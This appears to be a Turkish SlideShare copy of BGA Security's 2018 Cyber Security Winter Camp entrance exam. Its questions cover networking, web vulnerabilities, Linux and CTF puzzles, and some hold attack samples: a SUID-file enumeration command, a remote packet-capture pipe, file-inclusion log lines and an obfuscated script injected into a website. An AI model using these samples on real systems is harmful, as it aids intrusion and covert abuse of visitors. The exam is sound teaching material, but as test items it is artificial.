O slideshow foi denunciado.
Utilizamos seu perfil e dados de atividades no LinkedIn para personalizar e exibir anúncios mais relevantes. Altere suas preferências de anúncios quando desejar.

Siber Güvenlik Kış Kampı'18 Soruları

Siber Güvenlik Kış Kampı'18 Sınav Soruları @BGASecurity | @Siberkamp | www.siberkamp.org

  • Entre para ver os comentários

Siber Güvenlik Kış Kampı'18 Soruları

  1. 1. SİBER GÜVENLİK KIŞ KAMPI’18 SORULARI Yazar:BGA BilgiGüvenliğiAKADEMİSİ Baskı:2017/12
  2. 2. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity Giriş BGA Bilgi Güvenliği AKADEMİSİ, “Siber Güvenlik” konusunda kariyer yapmak ve bu konuda uzmanlaşmak isteyen üniversite öğrencilerini, Siber Güvenlik Kamp’larına davet ediyor. Ülkemizde Siber Güvenlik ile ilgili nitelikli eleman yetiştirme potansiyeli sadece %1 seviyesindedir. Bu alandaki insan kaynağı eksikliğini gidermek ve ülkemizin Ulusal Siber Güvenlik vizyonunu tamamlanmasına destek olmak amacı ile Bilgi Güvenliği AKADEMİSİ tarafından Siber Güvenlik Kamp’ları düzenlenmektedir. Siber güvenlik alanında teknik çalışmalar yürüten, üretmeyi ve projeler geliştirmeyi hedefleyen Bilgi Güvenliği AKADEMİSİ, sosyal sorumluluk projesi olarak gerçekleştirdiği Siber Güvenlik Kamp’ları ile bu alanda uzman yetiştirmeyi ve sektör katkı sağlamayı amaçlamaktadır. Bu alandaki insan gücü ihtiyacını karşılamak ve sektöre deneyimli, uzman personeller yetiştirmek amacı ile gerçekleştirilen Siber Güvenlik Kamplar’ına katılmaya hak kazanan öğrencilerin tüm masrafları, Bilgi Güvenliği AKADEMİSİ ve sponsor firmalar tarafından karşılanacaktır. Siber Güvenlik Kampı’na katılacak olan öğrenciler, Bilgi Güvenliği AKADEMİSİ’nin tecrübeli eğitmenleri ve sektörün önde gelen Siber Güvenlik Uzmanları’ndan 7 gün süreyle özel eğitim alma fırsatı yakalayacaklardır. Hacking, zafiyet tarama, zararlı yazılım analizi, mobil güvenlik, DDOS saldırılarına karşı doğru savunma gibi birçok konuda eğitim alacak olan Siber Güvenlik Kampı öğrencileri, eğitici ve öğretici CTF yarışmaları sayesinde takım çalışması yeteneklerini de arttıracak ve öğrenmiş oldukları bilgileri pekiştirebileceklerdir. Siber Güvenlik Kış Kampı’na katılıma hak kazanan öğrenciler, bilgi güvenliği alanında deneyim sahibi akademisyenler, kamu ve özel sektör yöneticileri ile de bir araya gelerek bu alanındaki kariyer fırsatları konusunda da bilgi sahibi olacaklar. “Gerçekleştirmiş olduğumuz Siber Güvenlik Kamp’larına bugüne kadar 20.000’den fazla başvuru yapıldı. Bu başvurularda ise 250’den fazla öğrenci Siber Güvenlik uzmanlarımız tarafından yetiştirildi ve sektöre kazandırıldı” Siber Güvenlik Kış Kampı’na üniversitelerin Ön Lisans, Lisans, Yüksek Lisans veya Doktora programlarında öğrenimleri devam eden kişiler kabul edilecektir. Kampa katılmaya hak kazanan öğrencilerin konaklama, yeme, içme, eğitim ve diğer giderleri Bilgi Güvenliği AKADEMİSİ ve sponsor firmalar tarafından karşılanacaktır. Kamp, başvurular ve sorularınız ile ilgili daha fazla bilgi almakiçin SiberKamp.org adresini ziyaret edebilir, eğitmen ve destekleyen firmalar hakkında bilgi edinebilirsiniz.
  3. 3. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORULAR SORU 1: Bir web sayfasının içeriği saldırganlar tarafından değiştirildiğinde aşağıdaki "bilgi güvenliği" kriterinden hangisi zarar görmüş olur? A) Gizlilik B) Bütünlük C) Kullanılabilirlik D) İnkâr Edilemezlik E) Hiçbiri SORU 2: Analiz için almış olduğumuz bir ağ trafiği dosyası incelenirken içerisinde NTFiM3JfNnV2RW5sMWtfazE1X2s0bVAxXzIwMTg= şeklinde bir bilgi tespit edilmiştir. Bu veri ne anlama gelmektedir? CEVAP: ………………………….. SORU 3: Saldırgan, kurban olarak belirlediği bir kişiye özel mesaj üzerinden http://k.url/s6k4mP1 şeklinde kısaltılmış bir link göndermektedir. Kurban bu linki açtığında karşısına bir pop-up mesajı çıkmaktadır. Bu noktada saldırgan aşağıdaki yöntemlerden hangisini veya hangilerini kullandığı söylenebilir? A) SQL Injection B) ARP Poisining C) ICMP Redirect D) Stored XSS E) Insecure Direct Object Reference(IDOR) F) ICMP Redirect G) Brute Force H) HTTP Flood I) Dom tabanlı XSS J) Reflected XSS SORU 4: TCP RST bayrağı ne işe yarar? A) Bağlantı başlatmak için kullanılır. B) Bağlantı sonrası oturum doğrulamak için kullanılır. C) Bağlantıyı tamamen sonlandırmak için kullanılır. D) Bağlantıdaki paketin öncelikli olduğunu belirtmek için kullanılır. E) TCP’nin üçlü el sıkışmasını başarıyla tamamlamak için kullanılır.
  4. 4. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 5: ICMP, OSI modeline göre hangi katmanda çalışır? A) 4 B) 3-2 C) 3 D) 5 E) 2 SORU 6: Aşağıdaki servislerden hangileri TCP kullanır? 1. DHCP 2. SMTP 3. HTTP 4. TFTP 5. FTP A) 1 ve 2 B) 2, 3 ve 5 C) 1, 2 ve 4 D) 1, 3 ve 5 E) 3 ve 5 SORU 7: OSI modelinin transport katmanı TCP/IP modelinde hangi katmana karşılık gelmektedir? A) Application B) Host-to-Host C) Internet D) Network Access E) Data Link SORU 8: 2048 tane cihazın (kullanıcının) bulunduğu bir ağ yapınız mevcut. IP yapılandırmaları ile ilgili olarak IP adresini, alt ağ maskesini, varsayılan gateway’i ve DNS sunucusuna ait bilgileri otomatik olarak dağıtmanız isteniyor. Bunu gerçekleştirmek için aşağıdaki protokollerden hangisini veya hangilerini kullanırsınız? A) SMTP B) SNMP C) ARP D) RARP E) DHCP
  5. 5. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 9: Linux tabanlı bir sistem üzerinde aşağıdaki gibi bir durum mevcuttur. -r-------- 1 root root 56112 May 2 2017 /bin/chmod ---------- 1 user user 92189 Jan 17 2017 /home/user/questions.txt Yukarıdaki duruma göre questions.txt dosyasının içini okumak isteyen root kullanıcısı aşağıdakilerden hangisini yapabilir? A) vi ya da nano kullanarak dosyayı açmalı. B) questions.txt dosyasına okuma izni vererek dosyayı açmalı. C) Dosya user kullanıcısına ait olduğundan root bunu okuyamaz. D) chmod'u yeniden yükleyip, dosyaya okuma izni vererek okumalı. E) questions.txt dosyası artık okunamaz olduğundan çöp dosya olmuştur. SORU 10: Saldırgan bir Linux sunucuya saldırı gerçekleştirmiştir. Analiz esnasında çalıştırılan komutlar arasında yukarıdaki gibi bir komut tespit edilmiştir. Bu komut ile saldırgan ne yapmak istiyor olabilir? find / ( -perm -u+s -or -perm -g+s ) -type f -exec ls -l {} ; A) Kernel versiyonuna ait zafiyetleri bulmak. B) Shell oluşturmak için yazma izni olan dizinleri bulmak. C) root grubuna dahil kullanıcıları bulmak. D) root izinlerinin mevcut olduğu dizinleri bulmak E) root izinlerini kullanabileceği komutları bulmak
  6. 6. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 11: Log analizi gerçekleştirirken bir web sunucusunda aşağıdaki kayıtlara rastlanmıştır. Buna göre aşağıdakilerden hangisi ya da hangileri doğrudur? A) Brute force saldırı yapılmıştır. B) Saldırı başarılı olarak sonuçlanmıştır. C) Saldırı başarısız olmuştur. D) Saldırıyı gerçekleştiren sistem gatewaydir. E) Saldırı veritabanına yapılmıştır. F) Saldırı web sunucusunun 16020 portuna yapılmıştır. G) Bu saldırı kullanıcıların sunucu üzerindeki web sitesini ziyaret etmesini engellemektedir. SORU 12: Bir Linux sistem üzerinde aşağıdaki komutları çalıştıran kişi ne yapmayı amaçlar? iptables -A INPUT -p icmp -m icmp --icmp-type address-mask-request -j DROP iptables -A INPUT -p icmp -m icmp --icmp-type timestamp-request -j DROP iptables -A INPUT -p icmp -m icmp -m limit --limit 1/second -j ACCEPT A) ICMP paketlerine cevap verilmesini engelliyordur. B) SYN flood saldırısını engelliyordur. C) Peer-to-Peer Attack’ı engelliyordur. D) Smurf Attack’ı engelliyordur. E) Slowloris saldırısını engelliyordur. SORU 13: Bir Linux sistem üzerinde aşağıdaki komutu çalıştıran kişi ne yapmayı amaçlar? ssh 192.168.7.13 "sudo /usr/sbin/tcpdump -s0 -w - 'port 80'" | wireshark -k -i - CEVAP: …………………..
  7. 7. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 14: Windows sistemlerde DNS çözümleme sırası nasıl gerçekleşmektedir? i) Wins ii) DNS Cache iii) LmHosts Dosyası iv) NetBIOS Name Cache v) Hosts Dosyası vi) Broadcast vii) DNS A) iv-ii-v-vii-vi-i-iii B) ii-v-vii-iv-i-vi-iii C) v-vii-iii-ii-vi-i-iv D) vii-v-ii-iii-i-vi-iv E) iii-ii-v-vii-vi-i-iv SORU 15: Aşağıdakilerden hangisi ya da hangileri DHCP Discover mesajını tanımlar? 1. 2. Katman yayını olarak FF:FF:FF:FF:FF:FF kullanılması 2. UDP protokolü kullanılması 3. TCP protokolü kullanılması 4. 2. katman yayını olarak adres kullanmaması A) Yalnız 1 B) Yalnız 2 C) 1 ve 2 D) 3 ve 4 E) Yalnız 4
  8. 8. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 16: Bir saldırgan sonradan dahil olduğu bir kafenin ağında gözüne bir kurban kestirmiştir. Kurbana bir saldırı düzenleyerek yukarıdaki grafikte gösterilen sonucu elde etmiştir. Buna göre saldırgan aşağıdaki saldırılardan hangisini gerçekleştirmiş olabilir? A) ARP Poisining B) SQL Injection C) Error Based XSS D) ARP Spoofing E) ICMP Redirect F) DHCP Mangling G) Smurf Saldırısı H) IP Spoofing I) SYN Flood J) DHCP Session Clicking K) IP Redirect SORU 17: ICMP paketleri ile ilgili olarak aşağıdakilerden hangisi ya da hangileri doğrudur? 1. Bir TCP segmentinin alındığını onaylarlar. 2. Bir datagram alındığını onaylarlar. 3. Cihazlara ağ sorunları hakkında bilgi sağlarlar. 4. IP datagramları içerisinde kapsüllenirler. A) Yalnız 1 B) Yalnız 3 C) 1 ve 2 D) 3 ve 4 E) Hepsi
  9. 9. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 18: Aşağıdakilerden hangisi bir router’ın bir uzak bilgisayara yönelik ARP isteğine yanıt vermesini sağlar? A) Gateway DP B) Reverse ARP (RARP) C) Proxy ARP D) Inverse ARP (IARP) E) Hiçbiri SORU 19: KRACK zafiyeti ile ilgili olarak aşağıdaki ifadelerden hangisi ya da hangileri doğrudur? A) Kablosuz ağın parolasını bulmak için kullanılır. B) WPA-TKIP kullanılarak saldırı önlenebilir. C) AES-CCMP kullanmak saldırıyı önlemez. D) WPA1 bu saldırıdan etkilenir; ancak WPA2 etkilenmez. E) Saldırıyı hafifletmek için 802.11r özelliği devre dışı bırakılabilir. F) Kablosuz ağ cihazının WPS özelliğini kapatmak saldırıyı önleyebilir. G) Bu saldırı kablosuz ağın PSK bilgilerini bilmeden ağ trafiğini görüntülemeyi sağlar. SORU 20: Aşağıdakilerden hangisi en güçlü kablosuz sinyal şifrelemesi sunar? A) WAP B) WEP C) WPA D) WINS E) WIN SORU 21: WPA2 için güvenlik standardı aşağıdakilerden hangisidir? A) 802.11ad B) 802.11i C) 802.11n D) 802.11a E) 802.11b
  10. 10. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 22: Aşağıdaki kodun barındırdığı zafiyet nedir? A) SQL Injection B) Dom based XSS C) Stored XSS D) File Inclusion E) Command Injection SORU 23: Aşağıdaki kodun barındırdığı zafiyet nedir? A) CSRF (Cross-Site Request Forgery) B) SQL Injection C) Command Injection D) Reflected XSS E) IDOR (Insecure Direct Object Reference)
  11. 11. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 24: Aşağıdaki kod parçacığını inceleyen bir siber güvenlik uzmanı aynı zamanda web loglarını da incelediğinde bol miktarda… GET /index.php?file=index.php HTTP/1.0 GET /index.php?file=index.php HTTP/1.0 GET /index.php?file=index.php HTTP/1.0 …loglarını görmektedir. Bu saldırıya ne ad verilmektedir? A) SQL injection B) Cross-Site Request Forgery C) Reflected XSS D) Denial of Service E) Directory Traversal
  12. 12. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 25: Web sitesi oldukça fazla ziyaret edilen bir blogger, web sitesinin kaynak kodunu incelediğinde aşağıdaki kodun bulunduğunu fark etmiştir. Bu kod ne ifade eder? $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$] +"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$, $__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$ $]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$. $;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+"" +$.__$+$.$$_+$.$$_+$.$_$_+""+$.__$+$.$$_+$._$_+""+$.$__+$.___+""+$.__$+$.$_$+ $.$_$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$._$_+" "+$.$__+$.___+"="+$.$__+$.___+""+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$. $$$+""+$.$__+$.___+""+$.__$+$.___+$._$$+$._$+""+$.__$+$.$_$+$.__$+""+$.__$+ $.$_$+$.$$_+""+$.__$+$.__$+$.___+""+$.__$+$.$_$+$.__$+""+$.__$+$.$$_+$.$$_+$. $$$_+"."+$.__$+$.___+$.__$+""+$.__$+$.$_$+$.$$_+$._$+""+$.__$+$.$_$+$.$$_+"" +$.__$+$.$$$+$.__$+""+$.__$+$.$_$+$.$_$+$._$+$._+""+$.__$+$.$$_+$._$$+"('"+$._ _$+$.$_$+$._$$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$ +"_"+$._$+$.$$$$+"_"+$.__+""+$.__$+$.$_$+$.___+$.$$$_+"_"+$.__$+$.$_$+$.$_$+" "+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$._$_+""+$.__$ +$.$$_+$._$$+"',"+$.$__+$.___+"{"+$.__$+$.$_$+$.$_$+""+$.__$+$.$_$+$.__$+""+$ .__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$._$_+"."+$.__$+$.$$_+$._$$+$.__+$.$_$_+ ""+$.__$+$.$$_+$._$_+$.__+"();}"+""")())(); A) Başka bir siteye ddos saldırısı yapmak istemektedir. B) Siteye giren kullanıcılara zararlı yazılım indirterek botnet ağı kurmaktadır. C) Siteye giren kullanıcıların işlem gücünü kullanarak mining(madencilik) yapmaktadır. D) Siteye giren kullanıcıların kimlik bilgilerini çalmaktadır. E) Siteyi başka bir adrese yönlendirmektedir. SORU 26: Bir sisteme sızan iki saldırgan arasındaki konuşmalarda aşağıdaki gibi şifreli bir mesaj geçmektedir. Bu mesajın ne anlama geldiğini açıklayınız. 77774442233777552672288777733663323266232 CEVAP: …………………………..
  13. 13. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 27: Bir bankanın saldırı almasından sonra yetkililer kredi kartı bilgilerinin sızdırılmış olabileceğinden şüpheleniyor. Gerçekleştirilen analiz işlemlerinden sonra çok sayıda wav dosyasının sızdırıldığını tespit ettik. Sizce bu ses kaydı ne anlama gelmektedir? [sample.wav] İndir; https://files.fm/u/7utccbbt CEVAP: ………………………………….. SORU 28: Aşağıdaki lokasyona gitmek için gizli bir bayrak ekledik. Bayrağı bulabilir misiniz? CEVAP: ……………………………… SORU 29: Aşağıdaki uygulamayı çalıştırdık ancak bayrağı bulamıyoruz. Bulabilir misin? [Sample.elf] İndir; https://files.fm/u/4ybbhh77 CEVAP: ……………………………
  14. 14. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 30: Ağ alt yapısında DMZ nereye kurulmalıdır? A) İç ağ ile güvenlik duvarı arasına B) İç ağa; ancak doğrudan güvenlik duvarına bağlı değil C) Dış ağ ve güvenlik duvarı arasına D) Güvenlik duvarının arkasında; ancak iç ağa doğrudan bağlı olmadan E) Güvenlik duvarının önüne; ancak doğrudan iç ağa bağlı olarak SORU 31: Saldırı tespit sisteminin iki türü nedir? A) Anomaly and signature B) Passive and active C) Internal and external D) Host and network E) Dynamic and directly SORU 32: Saldırı önleme sisteminin iki türü nedir? A) Anomaly and signature B) Passive and active C) Internal and external D) Host and network E) Dynamic and directly SORU 33: Aşağıdakilerden hangisi asimetrik anahtar şifrelemesi kullanmaktadır? A) AES B) PGP C) 3DES D) RC5 E) DES SORU 34: OSI modelinin ağ katmanında çalışan güvenlik duvarlarının iki türü aşağıdakilerden hangisidir? A) Stateful and stateless B) Dynamic and static C) Anomaly and signature D) Mandatory and discretionary E) Passive and active
  15. 15. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 35: Değerli bilgiler taşıyan bir sistem izole edilmiş bir ağ içerisinde sürekli olarak izlenecek şekilde konumlandırılmıştır. Bu ne amaçla yapılan bir güvenlik tedbiridir? A) Pseudo-network B) Honeypot C) Virtual Network D) Canary Trap E) VPN SORU 36: Rol tabanlı erişim denetim listelerinin iki türü aşağıdakilerden hangisidir? A) Mandatory and discretionary B) Object and permission C) Filesystem and networking D) Dynamic and static E) Passive and active SORU 37: Aşağıdakilerden hangisi Pseudo/Virtual dosya sistemleri arasında yer almaz? A) Devfs B) Debugfs C) Tmpfs D) Ext3 E) Winfs SORU: 38: Hangisi bir zararlıyı diske yazıldığı anda tespit edebilen bir AV yeteneğidir. A) In-Memory Scan B) On-Demand C) On-Access D) Heuristic Engine E) Static Analysis SORU 39: Hangisi, Zararlıların istismar aşamasına geçtiklerinde kullandıkları ve yıkıcı etkiye sahip varlıklarına verilen addır. A) Shellcode B) Payload C) Pseudo-Code D) Opcode E) Hexcode
  16. 16. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 40: Hangisi bir güvenlik çözümüne yakalanmadan, exploitin/zararlının hedefine ulaşmasına yol açan tekniklere verilen isimdir. A) Bypass B) Injection C) Massive Attack D) Blinding E) Evasion SINAV SÜRESİ: 3 Saat Sınavımız tamamlandı. Detaylı bilgi için siberkamp@bga.com.tr adresimiz ile iletişime geçebilirsiniz.
  17. 17. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity BGA Bilgi Güvenliği A.Ş. Hakkında BGA Bilgi Güvenliği A.Ş. 2008 yılından bu yana siber güvenlik alanında faaliyet göstermektedir. Ülkemizdeki bilgi güvenliği sektörüne profesyonel anlamda destek olmak amacı ile kurulan BGA Bilgi Güvenliği, stratejik siber güvenlik danışmanlığı ve güvenlik eğitimleri konularında kurumlara hizmet vermektedir. Uluslararası geçerliliğe sahip sertifikalı 50 kişilik teknik ekibi ile, faaliyetlerini Ankara ve İstanbul ve USA’da sürdüren BGA Bilgi Güvenliği’nin ilgi alanlarını “Sızma Testleri, Güvenlik Denetimi, SOME, SOC Danışmanlığı, Açık Kaynak Siber Güvenlik Çözümleri, Büyük Veri Güvenlik Analizi ve Yeni Nesil Güvenlik Çözümleri” oluşturmaktadır. Gerçekleştirdiği başarılı danışmanlık projeleri ve eğitimlerle sektörde saygın bir yer edinen BGA Bilgi Güvenliği, kurulduğu günden bugüne alanında lider finans, enerji, telekom ve kamu kuruluşlarına 1.000'den fazla eğitim ve danışmanlık projeleri gerçekleştirmiştir. BGA Bilgi Güvenliği, kurulduğu 2008 yılından beri ülkemizde bilgi güvenliği konusundaki bilgi ve paylaşımların artması amacı ile güvenlik e-posta listeleri oluşturulması, seminerler, güvenlik etkinlikleri düzenlenmesi, üniversite öğrencilerine kariyer ve bilgi sağlamak için siber güvenlik kampları düzenlenmesi ve sosyal sorumluluk projeleri gibi birçok konuda gönüllü faaliyetlerde bulunmuştur. BGA Bilgi Güvenliği AKADEMİSİ Hakkında BGA Bilgi Güvenliği A.Ş.’nin eğitim ve sosyal sorumluluk markası olarak çalışan Bilgi Güvenliği AKADEMİSİ, siber güvenlik konusunda ticari, gönüllü eğitimlerin düzenlenmesi ve siber güvenlik farkındalığını arttırıcı gönüllü faaliyetleri yürütülmesinden sorumludur. Bilgi Güvenliği AKADEMİSİ markasıyla bugüne kadar “Siber Güvenlik Kampları”, “Siber Güvenlik Staj Okulu”, “Siber Güvenlik Ar- Ge Destek Bursu”, “Ethical Hacking yarışmaları” ve “Siber Güvenlik Kütüphanesi” gibi birçok gönüllü faaliyetin destekleyici olmuştur.

×